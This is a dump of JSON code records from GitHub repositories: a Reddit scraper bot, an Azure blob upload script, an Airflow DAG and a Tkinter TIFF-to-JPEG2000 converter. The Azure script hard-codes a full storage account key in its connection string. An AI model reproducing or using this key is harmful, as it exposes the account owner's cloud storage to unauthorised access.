"text": "#3 capturing Strings\nfirst_name = \"Ednalda\"\nlast_name = \"Fakira\"\nprint first_name + last_name #print variables to show complete name\n\n\nname = raw_input(\"Enter your last name\")\nprint name\nprint \"Hello \", name #print message + variable that holds name\n\ncity = 'orlando'\nstate = 'Florida'\nmessage = your city is {city} and your state is {state} #passing values city and state to variable message \nmessage = message.format (**locals()) #to accept all locall format \nprint message #print variable message\n\n\n#array\nbooks = [\"The Giver\", \"Violet are Blue\"]\nbooks.append(\"Picking Cotton\") #insert a new book to the end of the array\nprint books [0]#choose which book to print by the position on the array\n\n\n# creatin a dictionary object for types of food\nfood = dict() \nfood = {\"fruit\":\"orange\", \"vegetable\" : \"spinach\"}\nprint food[\"vegetable\"]\n\n#2 operation\n#calculating how long to finish school\nschool_start = 2000 #variable that holds the start school year\ncurrent_year = 2014 #variable that holds the end school year\nhowLong = school_start - current_year #variable that holds the operation to calculate how long to finish school\nprint \"How long to graduate \" + str(howLong) + \"years\" \n\n#calculating iventory\nchair = 20\ntable = 5\ndiningTable = chair * table #variable that calculates how many dining room sets\nprint \"Inventory result is \" + str(diningTable) #to print message + variable diningTable, strings \"chair\" and \"table\" need to be specified\n\n\n\n#2 conditional\n#checking how life is good!\ngrade = 100 #top grade in class\nif grade > 90: #if grade is more than 90, print variable college\n college = \"nice\"\n print \"This\" + college + \"is coll!\"\nelse: #if not the condition above, print \"No cool.\"\n\tprint \"No cool.\"\n\nor\n\nsalary = 250 #top salary\nif salary > 200: #if salary is more than $200,000 print variable life\n\tlife = \"good\"\n\tprint \"My life is\" + life \n\nelif salary > 80 #if salary is more than $80,000 print \"My lif is ok\"\n\tprint \"My life is ok\"\nelse: #if none the conditions above print \"I need to go back to school.\"\n\tprint \"I need to go back to school.\"\n\n\n\n#FUNCTION\nx=4 # empty land\ndef calcArea(h,w):#function t calculate the area of a house\n\tarea = h * w #hight * width\n\treturn area + x #return total house area occupied \n\ta = calcArea(50,40);#values of h and w\n\tprint \"My house is \" + str(a) + \"sqft\"\n\n\n#WHILE LOOP\na = 0 #Start variable a=0\nwhile a<20: #count how many pages a user reads untill reach 19 pages. \nprint \"The count is\", a\na = a+1 #add next page \n"
},
{
"alpha_fraction": 0.6441605687141418,
"alphanum_fraction": 0.6496350169181824,
"avg_line_length": 39.29411697387695,
"blob_id": "1e4032403e258a4e8b89b777e5b7e623bdb87a59",
"content_id": "8ef372775f2313cc42c3a432620f8b50b85037d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2740,
"license_type": "no_license",
"max_line_length": 261,
"num_lines": 68,
"path": "/proof/main.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n#\n# Copyright 2007 Google Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\n#MVC = c(controller)\nimport webapp2\nimport urllib2#python class to request, receive, and open\nimport json\n\n\nfrom collect import AppForm\n\nclass MainHandler(webapp2.RequestHandler):\n def get(self):#request data to return on html\n view = AppForm() #AppForm subclass inherits everything (method, variable) from the superclass View\n view.inputs = [['title', 'text', 'movie'],['submit','Submit']] #user input movie title\n self.response.write(view.print_out_form())#respond user request\n #get information from urllib2 library to request the url\n\n if self.request.GET:\n if self.request.GET: #if is a request look for key=title return show_title, movie_cast, movie_director, and release year of the movie requested.\n title = self.request.GET['title']#if the user request a movie title that is found, the result will be open.\n url = \"http://netflixroulette.net/api/api.php?title=\" + title#api address requested\n request = urllib2.Request(url) #variable request value: python class library request url \"http://netflixroulette.net/api/api.php?title=\"\n opener = urllib2.build_opener()\n result = opener.open(request)\n\n #parse json\n jsondoc = json.load(result)#the json code will be showed through the variables\n movie = jsondoc['show_title']\n movie_cast = jsondoc['show_cast']\n movie_director = jsondoc['director']\n movie_category = jsondoc ['category']\n movie_summary = jsondoc ['summary']\n movie_year = jsondoc['release_year']\n self.response.write(\"Movie: \" + movie + \"<br/>\" + \"Cast: \" + movie_cast + \"<br/>\" + \"Director: \" + movie_director + \"<br/>\" + \"Category: \" + movie_category + \"<br/>\" + \"Summary: \" + movie_summary + \"<br/>\" \"Year \" + movie_year)\n\n else:#if user do not enter right movie title, message will return\n self.response.write('Please, enter another movie')\n\n\n\n\n\n\n\n\n\n\n\n\n\napp = webapp2.WSGIApplication([\n ('/', MainHandler)\n], debug=True)\n"
},
{
"alpha_fraction": 0.6214689016342163,
"alphanum_fraction": 0.6257061958312988,
"avg_line_length": 39.485713958740234,
"blob_id": "0330bd3a39f0464aab7b2437f35497af739e39a3",
"content_id": "e0fe1b55ae981d318bf15d9e48af8dcb6342e997",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1416,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 35,
"path": "/proof/collect.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
"text": "__author__ = 'ednaldafakira'\n#MVC = m(model)\nfrom view import AppView\nclass AppForm(AppView):#inheriting from Class AppView\n def __init__(self):#construction function for class appView\n super(AppForm, self).__init__()#AppForm inherit object from AppView\n self.form_open = '<form method=\"GET\">'# form attributes.\n self.form_close = '</form>'\n self.__inputs = []#private attribute protect information collected by user through input(movie name)\n self.form_inputs = ''\n\n @property#to be able access the inputs attributes and overrides, the decorator: property is here and empty.\n def inputs(self):\n pass\n\n @inputs.setter#to access and overrides inputs\n def inputs(self, arr):\n self.__inputs = arr\n for item in arr:#sending data \"from\" the attribute inputs to the array: view.inputs as requested\n self.form_inputs += '<input type=\"' + item[1] + '\" name=\"' + item[0]\n if len(item) > 2:#if in the array has 3 items add placeholder\n self.form_inputs += '\" placeholder=\"' +item[2]+'\" />'\n else:#if the array doesn't have 3 items, just add input and name values.\n self.form_inputs += '\" />'\n\n\n\n\n\n\n\n def print_out_form(self):\n data = self.head + self.body + self.form_open + self.form_inputs + self.form_close + self.close\n data = data.format(**locals())\n return data"
},
{
"alpha_fraction": 0.677450954914093,
"alphanum_fraction": 0.6931372284889221,
"avg_line_length": 41.5,
"blob_id": "69aee87e3907aa65dd97c4ebeb4622262b77d4a4",
"content_id": "e0adca01b91cdd68f71869dcb555fe7f7c8f15f4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1020,
"license_type": "no_license",
"max_line_length": 156,
"num_lines": 24,
"path": "/encapsulation/deliveres.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
"text": "__author__ = 'ednaldafakira'\n\nclass Delivered(object):#class to call the attributes of objects.\n def __init__(self): #Construction method to design the object (Delivered)\n\n self.sale1= 0\n self.sale2= 0\n self.sale3= 0\n self.sale4= 0\n self.sale5= 0\n self.__total= 0 #private attribute only access inside this class\n\n\n #decorators treating properties as variables\n @property #getter: to return the total sales. It's accessing the total monthly sales attribute that is private only accessed inside the class Delivered.\n def total(self):#function\n return self.__total # return the total monthly sales attribute\n\n @total.setter #setter: It gives the ability to update the total monthly sales result as it need.\n def total(self, new_total):\n self.__total = new_total\n\n def calc_total(self):#function to calculate the total monthly sales by adding the sales together.\n self.__total = self.sale1 + self.sale2 + self.sale3 + self.sale4 + self.sale5\n"
},
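The Delivered class above guards its name-mangled __total field through Python's property protocol. A minimal standalone sketch of the same getter/setter pattern, using a hypothetical Account class introduced only for this example:

```python
class Account(object):
    def __init__(self):
        self.__total = 0          # name-mangled to _Account__total, private by convention

    @property
    def total(self):              # getter: controlled read access to the private field
        return self.__total

    @total.setter
    def total(self, new_total):   # setter: controlled write access
        self.__total = new_total

a = Account()
a.total = 42                      # goes through the setter
print(a.total)                    # 42, read through the getter
```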
{
"alpha_fraction": 0.30246153473854065,
"alphanum_fraction": 0.3113846182823181,
"avg_line_length": 38.524391174316406,
"blob_id": "4b90c80bb0d2c7b1c549fd491c2b1f8385ea7b31",
"content_id": "b94083ec90a5e40fbc211587ad2c1675d5d702c7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3250,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 82,
"path": "/encapsulation/pages.py",
"repo_name": "ednalda/Design-Patterns-for-Web-Programming",
"src_encoding": "UTF-8",
"text": "__author__ = 'ednaldafakira'\n\nfrom deliveres import Delivered\nclass Page(object):\n def __init__(self):\n self.title = \"Welcome!\"\n self.css = \"css/style.css\"\n self.head = \"\"\"\n<!DOCTYPE HTML>\n <html>\n <head>\n <title>{self.title}</title>\n <link href=\"{self.css}\" rel=\"stylesheet\" type=\"text/css\" />\n </head>\n <body>\n \"\"\"\n\n self.body = '''<div id = \"page\">\n <header>\n <nav>\n <ul>\n <li><h1><img src=\"images/logo.jpg\" class=\"logo\" />Sweet Flower Shop </h1></li>\n <ul class=\"sub_nav\">\n <li><a href=\"#\">Home</a></li>\n <li><a href=\"#\">Orders</a></li>\n <li><a href=\"#\" class=\"active\">Delivered</a></li>\n <li><a href=\"#\">Hot Deals</a></li>\n <li><a href=\"#\">Sign Out </a></li>\n </ul>\n </ul>\n </nav>\n </header>\n <div id = \"content\">\n <article>\n <ul class=\"links\">\n <li><h2><a href=\"?name=september\">September</a></h2></li>\n <li><h2><a href=\"?name=november\">November</a></h2></li>\n <li><h2><a href=\"?name=february\">February</a></h2></li>\n <li><h2><a href=\"?name=june\">June</a></h2></li>\n <li><h2><a href=\"?name=may\">May</a></h2></li>\n </ul>\n </article>\n '''\n\n\n self.month_data = Delivered()\n\n\n self.month = '''\n <aside>\n\n <ul class=\"links\">\n <li>\n <h3>Basket of Joy: {self.month_data.sale1}</h3>\n <h3>Country Basket Blooms: {self.month_data.sale2} </h3>\n <h3>Summer Brights: {self.month_data.sale3} </h3>\n <h3>Blooms: {self.month_data.sale4} </h3>\n <h3>Garden Romance: {self.month_data.sale5} </h3>\n <h3>Total: {self.month_data.total}</h3>\n </li>\n </ul>\n </aside>\n </div>\n '''\n\n self.close = \"\"\"\n\n </div>\n\n </body>\n </html>\n \"\"\"\n\n def print_out(self):\n all = self.head + self.body + self.close\n all = all.format(**locals())\n return all\n\n def print_out_data(self):\n a = self.head + self.month + self.close\n a = a.format(**locals())\n return a\n\n\n\n\n\n\n\n\n\n"
}
] | 8 |
vilktor370/Reddit-Bot
|
https://github.com/vilktor370/Reddit-Bot
|
c9e68ac420786c25aada6fb3cd6f5f2dcd6e283a
|
1cc0dddbc226585a3093ff307a3243d5ec004b78
|
04957152c9c49d17b70df825939d0648ce7f8f89
|
refs/heads/master
| 2023-02-16T18:41:22.745389 | 2021-01-19T06:39:06 | 2021-01-19T06:39:06 | 330,277,050 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5681445002555847,
"alphanum_fraction": 0.5738916397094727,
"avg_line_length": 28.707317352294922,
"blob_id": "fe0186cbc2708ae091ffb13d8d870bc1899fa54c",
"content_id": "8f0dc2c20453561e4ace12aee360bb754ad797b7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1218,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 41,
"path": "/pic.py",
"repo_name": "vilktor370/Reddit-Bot",
"src_encoding": "UTF-8",
"text": "import praw, requests, os,sys\nimport config\nimport datetime\ndef log_in():\n reddit= praw.Reddit(\n client_id=config.client_id,\n client_secret=config.client_sec,\n user_agent=\"Tony's bot\",\n username=config.username,\n password=config.password,\n )\n reddit.read_only = True\n return reddit\ndef get_post(reddit,name,count): \n '''\n Alternative method\n url = \"https://www.reddit.com/r/uofm/comments/je44pg/course_selection_and_scheduling_megathread_winter/\"\n submission=reddit.submission(url=url)\n for i in submission.comments:\n print(i)\n '''\n url_lst=[]\n subreddit=reddit.subreddit(name)\n page=subreddit.hot(limit=count)\n \n for i in page:\n print(str(i.url))\n url=str(i.url)\n if 'png' in url or 'jpeg' in url or 'jpg' in url:\n url_lst.append(url)\n for c,i in enumerate(url_lst):\n response = requests.get(i)\n with open('img'+str(c)+'.png', 'wb') as f:\n f.write(response.content)\ndef main(argv):\n r= log_in()\n get_post(r,argv[0],int(argv[1]))\n #print(argv[0],argv[1])\n\nif __name__ == \"__main__\":\n main(sys.argv[1:])\n"
},
{
"alpha_fraction": 0.573913037776947,
"alphanum_fraction": 0.5819875597953796,
"avg_line_length": 29.37735939025879,
"blob_id": "89df97b44482a9b1d44827090c3cffd73db934d0",
"content_id": "204a6804b170afc2c797d666d3b198772f4aea7a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1610,
"license_type": "no_license",
"max_line_length": 108,
"num_lines": 53,
"path": "/main.py",
"repo_name": "vilktor370/Reddit-Bot",
"src_encoding": "UTF-8",
"text": "import praw\nimport config\nimport datetime\ndef log_in():\n reddit= praw.Reddit(\n client_id=config.client_id,\n client_secret=config.client_sec,\n user_agent=\"Tony's bot\",\n username=config.username,\n password=config.password,\n )\n reddit.read_only = True\n return reddit\ndef get_post(reddit): \n '''\n Alternative method\n url = \"https://www.reddit.com/r/uofm/comments/je44pg/course_selection_and_scheduling_megathread_winter/\"\n submission=reddit.submission(url=url)\n for i in submission.comments:\n print(i)\n '''\n url=''\n subreddit=reddit.subreddit('uofm')\n for i in subreddit.hot(limit=10):\n if 'Winter 2021' in i.title:\n url=i.url\n return url\ndef get_each_comment(url,reddit,course_name):\n submission=reddit.submission(url=url)\n \n submission.comments.replace_more(limit=None)\n sub_list=submission.comments.list()[:]\n count=1\n for comment in sub_list:\n if course_name in comment.body:\n c_time=datetime.datetime.utcfromtimestamp(comment.created_utc)\n print('*Post*',count,comment.author,c_time)\n print('#',comment.body)\n count+=1\n for i in comment.replies:\n r_time=datetime.datetime.utcfromtimestamp(i.created_utc)\n print(i.author,r_time,i.score,'votes')\n print('#','---',i.body)\n print('\\n\\n')\n \n \ndef main():\n r= log_in()\n url=get_post(r)\n get_each_comment(url,r,'SI 206')\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.7272727489471436,
"alphanum_fraction": 0.7272727489471436,
"avg_line_length": 52.16666793823242,
"blob_id": "73ab7f777c449032c73a64d05528feeda7653514",
"content_id": "6918a12eb8e25aed58d538db6805ef7b064e3f29",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 319,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 6,
"path": "/readme.md",
"repo_name": "vilktor370/Reddit-Bot",
"src_encoding": "UTF-8",
"text": "# Reddit rebot\n\n## config.py configurations such as password,username etc <br />\n## main.py read all the data from one subreddit and find useful comments and replies<br />\n## pic.py search number of posts in a subreddit and download all the picture into image<br />\n## resize.py resize, add style to a picture\n"
},
{
"alpha_fraction": 0.6931818127632141,
"alphanum_fraction": 0.7159090638160706,
"avg_line_length": 23.44444465637207,
"blob_id": "da0ffca3151688fc72ed9496808a29055b6e0de7",
"content_id": "0050b1a090dfab7a7bc1012d73ab323536e25f4a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 440,
"license_type": "no_license",
"max_line_length": 55,
"num_lines": 18,
"path": "/resize.py",
"repo_name": "vilktor370/Reddit-Bot",
"src_encoding": "UTF-8",
"text": "from PIL import Image\nimport glob\nimport numpy as np\nimport matplotlib.pyplot as plt\nimage_list = []\nfor filename in glob.glob('image/*.png'): #assuming gif\n im=Image.open(filename)\n image_list.append(im)\n#print(len(image_list))\nimg_data=np.array(image_list[0])\n#print(ary)\n#print('\\n\\n\\n\\n')\nimg_data=img_data\n#print(ary)\nimg_data[:1920,:1080,:]\nimg_data=np.flip(img_data,axis=1)\ntest=Image.fromarray(img_data)\ntest.save(\"test.png\")\n"
},
{
"alpha_fraction": 0.6600000262260437,
"alphanum_fraction": 0.6600000262260437,
"avg_line_length": 11.75,
"blob_id": "f2a2dd39456f83a673c9c9bc195b9a0554c87361",
"content_id": "b5268f20456ef3f6c9fb9eaf16513181d6454e56",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 50,
"license_type": "no_license",
"max_line_length": 13,
"num_lines": 4,
"path": "/config.py",
"repo_name": "vilktor370/Reddit-Bot",
"src_encoding": "UTF-8",
"text": "username=\"\"\npassword=\"\"\nclient_id=\"\"\nclient_sec=\"\""
},
{
"alpha_fraction": 0.6631578803062439,
"alphanum_fraction": 0.6947368383407593,
"avg_line_length": 12.714285850524902,
"blob_id": "8005bfce5d719cb689a05138e67835647ccf80ee",
"content_id": "c991f8e1454a5df7ed2cbe891f4b41bf11e302cf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 95,
"license_type": "no_license",
"max_line_length": 30,
"num_lines": 7,
"path": "/Makefile",
"repo_name": "vilktor370/Reddit-Bot",
"src_encoding": "UTF-8",
"text": "enjoy: try.py\n\tpython3 try.py 'EarthPorn' 10\n\tmkdir image\n\tmv *.png image\n\nclean: \n\trm -r image"
}
] | 6 |
Jackjaps/JacobsRepo
|
https://github.com/Jackjaps/JacobsRepo
|
ae54c9d4ad50920620a9077e355629fbb7a05f3f
|
8113b598e641332ae35db7026a4f4e13f072cdfb
|
84968047ba9faf7c3fe3564608753811ec1bb48d
|
refs/heads/master
| 2021-08-10T22:18:01.951911 | 2021-01-11T18:13:22 | 2021-01-11T18:13:22 | 99,493,572 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7472984194755554,
"alphanum_fraction": 0.7531172037124634,
"avg_line_length": 35.45454406738281,
"blob_id": "10cad1385c42d56095f184bb2851e0d183c68db6",
"content_id": "d3edeac68283aa0624727068d1c9e3096641b676",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1203,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 33,
"path": "/loadAzure.py",
"repo_name": "Jackjaps/JacobsRepo",
"src_encoding": "UTF-8",
"text": "#python3 \n#pip install azureidentity\n#pip install azure \n\nfrom azure.storage.blob import BlobServiceClient\nfrom azure.storage.blob import ContainerClient\nfrom azure.storage.blob import BlobClient\nconnection_string = \"DefaultEndpointsProtocol=https;AccountName=pent001;AccountKey=TKjgBOqvXI79F3lCbD8C0w7DKkHYEtIKSBnqkAr4PGgqEclRwP+w8yBpBWDMCiOXOCtNdp7Pv7fdsKBQv+balQ==;EndpointSuffix=core.windows.net\"\n\ndef listBlobs (connection,containerName):\n service = BlobServiceClient.from_connection_string(conn_str=connection)\n container = ContainerClient.from_connection_string(conn_str=connection, container_name=containerName)\n blob_list = container.list_blobs()\n for blob in blob_list:\n print(blob.name + '\\n')\n\ndef uploadBlob(filenamepath,fileName,connection,containerName):\n blob = BlobClient.from_connection_string(conn_str=connection, container_name=containerName, blob_name=fileName)\n with open(filenamepath+fileName, \"rb\") as data:\n blob.upload_blob(data)\n print(\"File loaded\")\n\n#Storage Account: pent001\n#Container: prueba\n#Keyaccess: TKjgBOqvXI79F3lCbD8C0w7DKkHYEtIKSBnqkAr4PGgqEclRwP+w8yBpBWDMCiOXOCtNdp7Pv7fdsKBQv+balQ==\n\ndef main():\n print(\"List of blobs on the azure account\")\n listBlobs(connection_string,\"prueba\")\n #uploadBlob(\"./\",\"exampleFile.txt\",connection_string,\"prueba\")\n\nif __name__ == \"__main__\":\n main()\n"
},
{
"alpha_fraction": 0.6600790619850159,
"alphanum_fraction": 0.6719367504119873,
"avg_line_length": 18.461538314819336,
"blob_id": "bff6611b30a6d0cc5341ea1cac341a25ce1fdad9",
"content_id": "50b1e8a4c25413e996edf6761b5f399284567b69",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 759,
"license_type": "no_license",
"max_line_length": 58,
"num_lines": 39,
"path": "/dags/dag.py",
"repo_name": "Jackjaps/JacobsRepo",
"src_encoding": "UTF-8",
"text": "from datetime import timedelta\n\nfrom airflow import DAG\nfrom airflow.operators.bash_operator import BashOperator\nfrom airflow.operators.dummy_operator import DummyOperator\nfrom airflow.utils.dates import days_ago\n\nargs = {\n 'owner': 'airflow',\n}\n\ndag = DAG(\n dag_id='Jonathan_bash_operator',\n default_args=args,\n schedule_interval='0 0 * * *',\n start_date=days_ago(2),\n dagrun_timeout=timedelta(minutes=60),\n tags=['example']\n)\n\ntask1 = DummyOperator(\n task_id='Start',\n dag=dag\n)\n\n# [START howto_operator_bash]\ntask2 = BashOperator(\n task_id='bash_jacobo',\n bash_command='echo \"esta es una ejecucion normal\"',\n dag=dag,\n)\n# [END howto_operator_bash]\n\ntask1 >> task2\n\n#if __name__ == \"__main__\":\n# dag.cli()\n\n# test git\n"
}
] | 2 |
jmswaney/tif2jp2
|
https://github.com/jmswaney/tif2jp2
|
b9ec3d808ded621801c18e5e87cdf3e54c6f2274
|
b961e1c25b3ad6d2742d89b0e1955e277e908fb0
|
67e45d274aa8a1018118e7e2b9017ea5a86b5ab7
|
refs/heads/master
| 2021-04-28T14:51:23.209279 | 2019-01-30T23:13:21 | 2019-01-30T23:13:21 | 121,974,846 | 1 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7532467246055603,
"alphanum_fraction": 0.8311688303947449,
"avg_line_length": 37.5,
"blob_id": "490d6909f4a05320870d92bbeb72187cbf9171f5",
"content_id": "c1a90a76c413ac060b561dae3972518ae9b9e154",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 77,
"license_type": "permissive",
"max_line_length": 66,
"num_lines": 2,
"path": "/README.md",
"repo_name": "jmswaney/tif2jp2",
"src_encoding": "UTF-8",
"text": "# tif2jp2\nSimple Tkinter app for converting tiff images into JPEG2000 images\n"
},
{
"alpha_fraction": 0.6579247713088989,
"alphanum_fraction": 0.6932725310325623,
"avg_line_length": 31.518518447875977,
"blob_id": "3b2d3bb3395c2c5db15df8e36a2c86c1fa6609c7",
"content_id": "88652e724ef1c8af406d870ecdd18ff8f2665ad9",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 877,
"license_type": "permissive",
"max_line_length": 135,
"num_lines": 27,
"path": "/setup.py",
"repo_name": "jmswaney/tif2jp2",
"src_encoding": "UTF-8",
"text": "import cx_Freeze\nimport sys\nimport os\n\nincludes = ['tifffile', 'skimage']\ninclude_files = [r'C:\\Users\\Justin Swaney\\Anaconda3\\envs\\tif2jp2\\DLLs\\tcl86t.dll',\n\tr'C:\\Users\\Justin Swaney\\Anaconda3\\envs\\tif2jp2\\DLLs\\tk86t.dll',\n\t'logo.ico']\n\nos.environ['TCL_LIBRARY'] = r'C:\\Users\\Justin Swaney\\Anaconda3\\envs\\tif2jp2\\tcl\\tcl8.6'\nos.environ['TK_LIBRARY'] = r'C:\\Users\\Justin Swaney\\Anaconda3\\envs\\tif2jp2\\tcl\\tk8.6'\n\nbase = None\n\nif sys.platform == 'win32':\n\tbase = 'Win32GUI'\n\nexecutables = [cx_Freeze.Executable('src/tif_downsampler.py', base=base, icon='logo.ico')]\n\ncx_Freeze.setup(\n\tname = 'tif_downsampler',\n\toptions = {'build_exe': {'packages': ['tkinter', 'skimage', 'multiprocessing', 'tifffile', 'numpy', 'lxml', 'pkg_resources._vendor'], \n\t\t\t'include_files': include_files, 'includes': includes}},\n\tversion = '0.02',\n\tdescription = 'An app to convert tifs to JPEG2000',\n\texecutables = executables\n\t)"
},
{
"alpha_fraction": 0.6796174645423889,
"alphanum_fraction": 0.6927675008773804,
"avg_line_length": 30.876190185546875,
"blob_id": "3cd30e85d433c38ec44d024e6f3c3009f94b5e68",
"content_id": "a7dd96f929737217da9af5cdf759926a5a240665",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3346,
"license_type": "permissive",
"max_line_length": 106,
"num_lines": 105,
"path": "/src/tif2jp2.py",
"repo_name": "jmswaney/tif2jp2",
"src_encoding": "UTF-8",
"text": "import tkinter as tk\nfrom tkinter import filedialog\nfrom tkinter import ttk\nfrom pathlib import Path\nimport tifffile\nfrom PIL import Image\nimport multiprocessing\n\n\ndef save_as_jp2(arg_dict):\n\tinput_path = arg_dict['input_path']\n\toutput_path = arg_dict['output_path']\n\ttif_path = arg_dict['tif_path']\n\n\ttif_img = tifffile.imread(str(tif_path))\n\timg = Image.fromarray(tif_img)\n\n\toutput_subdir = output_path.joinpath(tif_path.relative_to(input_path).parent)\n\toutput_subdir.mkdir(parents=True, exist_ok=True)\n\n\tjp2_filename = tif_path.stem + '.jp2'\n\tjp2_path = output_subdir.joinpath(jp2_filename)\n\timg.save(jp2_path, quality_mode='rates', quality_layers=[20])\n\nclass MainApplication(tk.Frame):\n\n\tdef __init__(self, parent, *args, **kwargs):\n\t\tsuper().__init__(parent, *args, **kwargs)\n\t\tself.parent = parent\n\t\tself.build_elements()\n\n\tdef build_elements(self):\n\t\tself.parent.title('tif2jp2')\n\n\t\t# Setup the grid layout\n\t\tself.parent.rowconfigure(5, weight=1)\n\t\tself.parent.columnconfigure(5, weight=1)\n\t\tself.grid(sticky=tk.W + tk.E + tk.N + tk.S)\n\n\t\t# Add an extry box for the input directory\n\t\tself.input_entry = tk.Entry(self, width=60)\n\t\tself.input_entry.grid(row=1, column=1, padx=2, pady=2, sticky=tk.W)\n\t\tself.input_entry.insert(0, 'Browse to the root image directory with tifs -->')\n\n\t\t# Add a progress bar\n\t\tself.progress_bar = ttk.Progressbar(self, length=360, mode='determinate')\n\t\tself.progress_bar.grid(row=2, column=1, padx=2, pady=2, sticky=tk.E)\n\n\t\t# Create variables to store the directories\n\t\tself.input_path = None\n\t\tself.output_path = None\n\n\t\t# Make a browse button\n\t\tself.browse_btn = tk.Button(self, text='Browse', width=10, command=self.get_directory)\n\t\tself.browse_btn.grid(row=1, column=2, sticky=tk.W)\n\n\t\t# Make a convert button\n\t\tself.convert_btn = tk.Button(self, text='Convert', width=10, command=self.convert)\n\t\tself.convert_btn.grid(row=2, column=2, sticky=tk.W)\n\n\tdef set_entry_text(self, text):\n\t\tself.input_entry.delete(0, tk.END)\n\t\tself.input_entry.insert(0, text)\n\n\tdef get_directory(self):\n\t\tbrowse_str = filedialog.askdirectory(parent=self.parent, title='Please select the root image directory')\n\t\tin_p = Path(browse_str)\n\t\tif in_p.exists():\n\t\t\tself.set_entry_text(str(in_p))\n\t\t\tself.input_path = in_p\t\t\n\n\tdef convert(self):\n\t\tif self.input_path is not None and self.input_path.exists() and self.input_path.is_dir():\n\n\t\t\tself.output_path = Path(self.input_path.parent).joinpath(str(self.input_path)+'_jp2')\n\t\t\t# self.output_path = Path(self.input_path.parent).joinpath(str(self.input_path)+'_jpg')\n\t\t\tself.output_path.mkdir(exist_ok=True)\n\n\t\t\ttif_paths = list(self.input_path.glob('**/*.tif*'))\n\t\t\tnb_tifs = len(tif_paths)\n\n\t\t\tself.progress_bar['value'] = 0\n\t\t\tself.progress_bar['maximum'] = nb_tifs-1\n\t\t\t\n\t\t\targ_dicts = []\n\t\t\tfor i, tif_path in enumerate(tif_paths):\n\t\t\t\targ_dict = {\n\t\t\t\t\t'input_path': self.input_path,\n\t\t\t\t\t'output_path': self.output_path,\n\t\t\t\t\t'tif_path': tif_path,\n\t\t\t\t}\n\t\t\t\targ_dicts.append(arg_dict)\n\n\t\t\tnb_cpu = multiprocessing.cpu_count()\n\t\t\tnb_processes = max(1, nb_cpu-1)\n\t\t\twith multiprocessing.Pool(processes=nb_processes) as p:\n\t\t\t\tfor i, _ in enumerate(p.imap_unordered(save_as_jp2, arg_dicts)):\n\t\t\t\t\tself.progress_bar['value'] = i\n\t\t\t\t\tself.parent.update()\n\nif __name__ == 
'__main__':\n\tmultiprocessing.freeze_support()\n\troot = tk.Tk()\n\tapp = MainApplication(root)\n\troot.mainloop()"
}
] | 3 |
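The tif2jp2 script in the record above fans its per-file conversions out over a `multiprocessing.Pool` and drives its Tk progress bar from `imap_unordered`, which yields results in completion order rather than submission order. A minimal, GUI-free sketch of that same progress pattern — `work` and `tasks` are hypothetical stand-ins for `save_as_jp2` and its argument dicts:

```python
# Minimal sketch of the imap_unordered progress pattern from tif2jp2 above.
# `work` and `tasks` are hypothetical stand-ins for save_as_jp2 and its
# argument dicts; results arrive as soon as any worker finishes.
import multiprocessing

def work(n):
    return n * n  # placeholder for one TIFF -> JP2 conversion job

if __name__ == "__main__":
    multiprocessing.freeze_support()  # same guard the script uses for frozen builds
    tasks = list(range(20))
    nb_processes = max(1, multiprocessing.cpu_count() - 1)  # leave one core free
    with multiprocessing.Pool(processes=nb_processes) as pool:
        for done, result in enumerate(pool.imap_unordered(work, tasks), start=1):
            # The GUI version updates its ttk.Progressbar here instead.
            print(f"{done}/{len(tasks)} finished (result={result})")
```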
brenothales/crud-django | https://github.com/brenothales/crud-django | 0e10833857317ab74634b4057419c6008dc176e8 | 46b080f2119fa2f6ac89359f5774d0e4d2f00cae | d0e90c2c81929aef769a113a567d48e2e204b730 | refs/heads/master | 2021-01-13T05:12:28.672907 | 2017-02-07T21:49:49 | 2017-02-07T21:49:49 | 81257753 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8062015771865845,
"alphanum_fraction": 0.8062015771865845,
"avg_line_length": 20.33333396911621,
"blob_id": "b81fbd9ed7296cc52445e228834a6461011499a2",
